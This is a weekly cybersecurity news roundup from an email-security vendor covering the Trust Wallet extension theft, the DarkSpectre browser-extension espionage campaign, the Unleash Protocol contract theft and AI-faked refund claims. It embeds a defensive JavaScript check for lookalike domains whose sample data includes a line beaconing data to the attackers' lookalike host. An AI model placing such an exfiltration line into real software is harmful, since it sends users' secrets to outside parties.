---
title: "Trust Wallet Hack, Browser Extension Espionage, Unleash Protocol Loss, Cybersecurity News [December 29, 2025] | DuoCircle"
description: "Trust Wallet Hack, Browser Extension Espionage, Unleash Protocol Loss, Cybersecurity News [December 29."
image: "https://www.duocircle.com/images/og-default.png"
canonical: "https://www.duocircle.com/blog/announcements/cyber-security-news-update-week-1-of-2026/"
---

Quick Answer

Week ending December 29, 2025 covered: a Trust Wallet supply-chain attack that stole approximately $8.5 million in crypto after attackers used exposed GitHub developer secrets and a Chrome Web Store API key to push tampered extension v2.68 on December 24, 2025, exfiltrating seed phrases for 2,520 wallet addresses to metrics-trustwallet\[.\]com (fixed in v2.69); the Koi Security DarkSpectre campaign linking malicious browser extensions on Chrome, Edge, and Firefox to Chinese actors, with 2.2 million users affected and 8.8 million across the related ShadyPanda and GhostPoster campaigns over seven years (the recent Zoom Stealer wave used 18+ extensions to harvest meeting metadata from Zoom, Google Meet, Teams, WebEx, and GoTo Webinar); a $3.9 million theft from Unleash Protocol after an unauthorized smart-contract upgrade through compromised multisig signing rights, with 1,337 ETH funneled through Tornado Cash; and a rise in AI-generated refund-fraud images on Chinese e-commerce platforms (RedNote, Douyin), with Forter reporting a 15%+ global increase in AI-altered refund claims this year.

Trust Wallet Hack, Browser Extension Espionage, Unleash Protocol Loss, Cybersecurity News \[December 29, 2025\]


[ Download episode](https://media.mailhop.org/duocircle/images/2026/01/Trust-Wallet-Hack-Browser-Extension-Espionage-Unleash-Protocol-Loss---Cybersecurity-News-December-29-2025.mp3) 


![cybersecurity news](https://media.mailhop.org/duocircle/images/2026/01/email-smtp-service-7865.jpg) 

This week’s [cybersecurity](/) news highlights how trust-based digital systems continue to be exploited across crypto platforms, browser ecosystems, and online marketplaces. Trust Wallet disclosed a major [supply-chain attack](https://www.securityweek.com/infostealer-malware-delivered-in-emeditor-supply-chain-attack/) that led to millions in stolen crypto, while researchers uncovered a **long-running browser extension** campaign tied to corporate espionage. 

A separate smart contract breach drained funds from Unleash Protocol, and **AI-generated images** are now being used to scale refund fraud across Chinese e-commerce platforms. Here’s what happened and why it matters.

## 1\. Trust Wallet Chrome Extension Hack Leads to $8.5 Million Crypto Theft

Trust Wallet has confirmed that a compromised Google Chrome browser extension was used to steal approximately [$8.5 million worth of cryptocurrency](https://www.cysecurity.news/2026/01/trust-wallet-chrome-extension-hack.html) from users, following a supply-chain attack traced back to November last year. The incident affected the **Trust Wallet Chrome extension** after attackers gained unauthorized access to its release pipeline.

According to the company, the breach occurred after developer GitHub secrets were exposed, giving attackers access to the extension’s source code and its **Chrome Web Store (CWS)** [API key](https://www.fortinet.com/resources/cyberglossary/api-key). With full CWS API access, the [threat actor](/phishing-protection/threat-actors-exploit-google-calendar-for-phishing-and-spoofing/) was able to upload malicious builds directly to the Chrome extension marketplace, bypassing Trust Wallet’s standard internal approval and review process.

[![ API access](https://media.mailhop.org/duocircle/images/2026/01/spf-record-7020.jpg)](https://media.mailhop.org/duocircle/images/2026/01/spf-record-7020.jpg)

_The attackers pushed a tampered version of the extension (v2.68) on December 24, 2025, embedding a backdoor designed to harvest wallet mnemonic seed phrases_. The [malware](/resources/malware-and-its-defense-mechanism) exfiltrated the data to attacker-controlled infrastructure hosted on a lookalike domain, metrics-trustwallet\[.\]com. Researchers found that the malicious code activated whenever the wallet was unlocked and collected seed phrases from all wallets **configured in a user’s account**, regardless of whether biometric or password authentication was used.

Security firm Koi reported that the stolen data was disguised as routine telemetry, making the activity difficult to detect **during casual code review**. Analysis also showed the attack was premeditated, with infrastructure staged weeks before the malicious update was deployed. The campaign ultimately impacted [2,520 wallet addresses](https://thecyberexpress.com/shai-hulud-attack-trust-wallet/).
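A release-gate check for the pattern described above, where seed-phrase exfiltration went to a brand-lookalike host and was dressed up as telemetry. This is an added example, not Trust Wallet's or Koi's code; the allowlist, brand token, file names and URL paths are assumptions constructed for illustration, and the registrable-domain logic is deliberately naive.

```javascript
// Added example: audit an extension bundle for outbound hosts that carry the
// brand name but are not on the publisher's own domains.

// Assumption: allowlist and brand tokens are maintained by the release team.
const POLICY = {
  allowedDomains: ["trustwallet.com"], // assumed first-party domain
  brandTokens: ["trustwallet"],
};

// Constructed sample bundle; file names and URL paths are illustrative only.
const SAMPLE_FILES = {
  "background.js": 'fetch("https://api.trustwallet.com/v1/prices");',
  "analytics.js":
    'const EP = "https://metrics-trustwallet.com/collect"; navigator.sendBeacon(EP, body);',
  "vendor.js": 'import("https://cdn.example.net/lib.js");',
};

// Naive registrable domain: the last two labels. A production check should
// use the Public Suffix List so suffixes such as "co.uk" are handled.
function registrableDomain(host) {
  return host.toLowerCase().split(".").slice(-2).join(".");
}

// Collect every http(s)/ws(s) hostname literal found in a source string.
function extractHosts(source) {
  const re = /\b(?:https?|wss?):\/\/([a-z0-9.-]+\.[a-z]{2,})/gi;
  const hosts = new Set();
  for (const m of source.matchAll(re)) hosts.add(m[1].toLowerCase());
  return [...hosts];
}

// first-party: registrable domain is allowlisted.
// lookalike:   not allowlisted, yet the hostname contains a brand token
//              (covers "metrics-brand.com" and "brand.com.other.net").
// unlisted:    any other third-party host, for manual review.
function classifyHost(host, policy) {
  if (policy.allowedDomains.includes(registrableDomain(host))) {
    return "first-party";
  }
  const squashed = host.toLowerCase().replace(/[^a-z0-9]/g, "");
  const brandHit = policy.brandTokens.some((t) => squashed.includes(t));
  return brandHit ? "lookalike" : "unlisted";
}

// Return one finding per (file, host) pair that is not first-party.
function auditBundle(files, policy) {
  const findings = [];
  for (const [file, source] of Object.entries(files)) {
    for (const host of extractHosts(source)) {
      const verdict = classifyHost(host, policy);
      if (verdict !== "first-party") findings.push({ file, host, verdict });
    }
  }
  return findings;
}

// A build passes the gate only if no lookalike host is present.
function releaseGatePasses(files, policy) {
  return auditBundle(files, policy).every((f) => f.verdict !== "lookalike");
}

console.log(auditBundle(SAMPLE_FILES, POLICY));
```

A check like this only helps when it runs against the artifact actually published to the store, since the tampered build on this page was uploaded with the store API key outside the normal review process.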

Trust Wallet has since urged its roughly one million [Chrome extension users](https://www.infosecurity-magazine.com/news/shadypanda-infects-43m-chrome-edge/) to upgrade to version 2.69, which removes the malicious code. _The company has launched a reimbursement claims process for affected users and says it has added additional monitoring controls around its software release processes_.

## 2\. Chinese-Linked Malicious Browser Extensions Tied to Corporate Espionage Campaign

Security researchers have uncovered a [large-scale malicious browser extension campaign linked to a Chinese threat actor](https://thehackernews.com/2025/12/darkspectre-browser-extension-campaigns.html) that has quietly harvested corporate meeting data from millions of **users across major browsers**. The activity, tracked by Koi Security under the name DarkSpectre, has affected an estimated [2.2 million users of Google Chrome, Microsoft Edge, and Mozilla Firefox](https://cybernews.com/security/darkspectre-malicious-browser-extension-campaign/).

[![snapshot](https://media.mailhop.org/duocircle/images/2026/01/SMTP-email-6675.jpg)](https://media.mailhop.org/duocircle/images/2026/01/SMTP-email-6675.jpg)

DarkSpectre has now been linked to two earlier extension-based campaigns, ShadyPanda and GhostPoster, bringing the total number of impacted users across all three operations to more than **8.8 million over a seven-year period**. The campaigns relied on seemingly legitimate browser extensions that were later weaponized to steal data, manipulate search results, [hijack affiliate traffic](https://thehackernews.com/2025/05/hazy-hawk-exploits-dns-records-to.html), and conduct advertising fraud.

The most recent DarkSpectre operation, also referred to as the [Zoom Stealer campaign](https://www.bleepingcomputer.com/news/security/zoom-stealer-browser-extensions-harvest-corporate-meeting-intelligence/), involved at **least 18 extensions posing** as tools for recording or managing online meetings. Once installed, the extensions harvested sensitive meeting data in real time, including meeting links, embedded passwords, IDs, schedules, participant details, and webinar metadata from platforms such as Zoom, Google Meet, Microsoft Teams, Cisco WebEx, and GoTo Webinar. 

[Indicators linking the campaigns to China](https://www.cysecurity.news/2026/01/chinese-linked-browser-extensions.html) include command-and-control servers hosted on Alibaba Cloud, **Chinese-language artifacts** in the code, and infrastructure registrations tied to Chinese provinces.

## 3\. Unleash Protocol Loses $3.9 Million After Unauthorized Smart Contract Upgrade

Decentralized intellectual property platform Unleash Protocol has confirmed a security breach that led to the theft of about [$3.9 million in cryptocurrency](https://finance.yahoo.com/news/unleash-protocol-hit-3-9-120928861.html?guccounter=1&guce%5Freferrer=aHR0cHM6Ly93d3cuZ29vZ2xlLmNvbS8&guce%5Freferrer%5Fsig=AQAAAHgnqTiySaHAt9W5swyALc97sF7q0mZthpGr-Yqj-6a2I9%5FC4gRCls7AS1emBasceYCez3txriXHToq8cOH3tApmsf%5Fy-XBG9YDe7pO-nVfGyR8Veud77BdUQ-n2fIAtZAzXKjzvOXVqKIkegRfKc8E76WYQdCUxg6rc7whiZEtR) after an unauthorized change was made to its smart contracts. The incident was disclosed on January 1, with blockchain security firm PeckShieldAlert separately estimating the total losses.

[![after an unauthorized ](https://media.mailhop.org/duocircle/images/2026/01/spf-record-check-7020.jpg)](https://media.mailhop.org/duocircle/images/2026/01/spf-record-check-7020.jpg)

Unleash said the attacker was able to gain enough signing permissions within its multisig governance system to act as an administrator. Using this access, the attacker pushed an unapproved contract upgrade that enabled [withdrawals that were never authorized by the Unleash team and fell outside normal governance procedures](https://www.cysecurity.news/2026/01/unleash-protocol-suffers-39m-crypto.html).

_Unleash Protocol is designed to turn intellectual property into tokenized blockchain assets that can be used in decentralized finance applications_. By exploiting the unauthorized upgrade, the attacker unlocked withdrawal features and drained several assets from the platform, including [USDC, wrapped IP, stacked IP, voting-escrowed IP, and wrapped Ether](https://www.scworld.com/brief/crypto-heist-pilfers-about-3-9m-from-unleash-protocol).

According to PeckShieldAlert, the stolen funds were then moved through third-party bridging services and sent to external wallets to make tracking more difficult. The attacker later deposited around **1,337 ETH into Tornado Cash**, a crypto mixing service often used to hide transaction trails.

Following the incident, Unleash Protocol has paused all platform activity and started a full investigation with **external security firms**. Users have been advised not to interact with Unleash smart contracts until further updates are shared through official channels.

[![attacker later deposited](https://media.mailhop.org/duocircle/images/2026/01/sender-policy-framework-7020.jpg)](https://media.mailhop.org/duocircle/images/2026/01/sender-policy-framework-7020.jpg)

## 4\. AI-Generated Images Fuel Refund Scams Across Chinese E-Commerce Platforms

Online sellers in China are dealing with a rising number of refund scams in which [fraudsters use AI-generated images and videos to fake damaged products](https://www.wired.com/story/scammers-in-china-are-using-ai-generated-images-to-get-refunds/). The issue is spreading across major e-commerce and social shopping platforms, many of which rely on **customer-submitted photos** instead of physical returns when approving refunds.

Merchants on platforms like **RedNote and Douyin** have shared several examples of suspicious claims. These include photos of bed sheets that appear unrealistically shredded, ceramic cups that look torn like paper, and shipping labels with distorted or unreadable text. Sellers say certain product categories are being targeted more often, especially fresh groceries, low-cost beauty items, and fragile products, since refunds in these cases are usually issued without requiring a return.

[![scam unraveled ](https://media.mailhop.org/duocircle/images/2026/01/spf-record-tester-7020.jpg)](https://media.mailhop.org/duocircle/images/2026/01/spf-record-tester-7020.jpg)

One case that gained widespread attention involved a live crab seller who received photos and videos claiming that most of the crabs arrived dead. The scam unraveled after the seller noticed clear inconsistencies, including **incorrect crab anatomy**. Police later confirmed the images were fabricated and briefly detained the buyer, making it one of the first known cases in [China where AI-based refund fraud](https://www.wired.com/story/scammers-in-china-are-using-ai-generated-images-to-get-refunds/) led to enforcement action.

_This trend isn’t limited to China. Fraud detection company Forter reports that the use of AI-altered images in refund claims has increased by more than 15 percent globally this year_. Researchers warn that easy access to image-generation tools is lowering the barrier for large-scale refund fraud, pushing online platforms to rethink how **trust-based refund systems work**.


![Brad Slavin](https://media.mailhop.org/dmarcreport/images/team/brad-slavin.jpg) 

Brad Slavin 

General Manager

General Manager at DuoCircle. Product strategy and commercial lead across the email security portfolio.

